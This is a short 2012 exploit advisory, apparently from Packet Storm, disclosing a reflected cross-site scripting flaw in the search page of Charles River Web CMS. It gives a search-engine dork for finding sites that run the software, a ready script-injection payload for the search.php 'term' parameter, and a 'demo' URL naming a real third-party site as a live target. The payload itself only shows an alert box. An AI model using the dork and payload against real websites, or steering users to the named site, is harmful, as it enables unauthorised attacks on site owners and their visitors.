Charles River Web CMS Cross Site Scripting

2012-04-04T00:00:00
ID PACKETSTORM:111538
Type packetstorm
Reporter Am!r
Modified 2012-04-04T00:00:00

Description

                                        
                                            `########################################################  
#  
# Exploit Title : Charles-River-Web Cms Cross Site Scripting Vulnerabilitiy  
#  
# Author : IrIsT.Ir  
#  
# Discovered By : Am!r  
#  
# Home : http://IrIsT.Ir & Http://Security7.ir  
#  
# Software Link : http://www.charlesriverweb.com/  
#  
# Security Risk : High  
#  
# Version : All Version  
#  
# Tested on : GNU/Linux Ubuntu - Windows Server - win7  
#  
# Dork : "Powered by Charles River Web"  
#  
########################################################  
#  
# Expl0iTs :  
#  
# [TarGeT]/search.php?term="><script>alert(/amir/)</script>  
#  
# D3m0 :  
#  
# pubs.healtheffects.org/search.php?term=[Xss]&submit=Search  
#  
#########################################################  
#  
# Greats : Zarbat.Org - Aria-Security.Com - datacoders.org - black-hg.org  
#   
# AjaxTm.Com - Sepehr-Team.Org And All Iranian Hackers  
#  
#########################################################  
`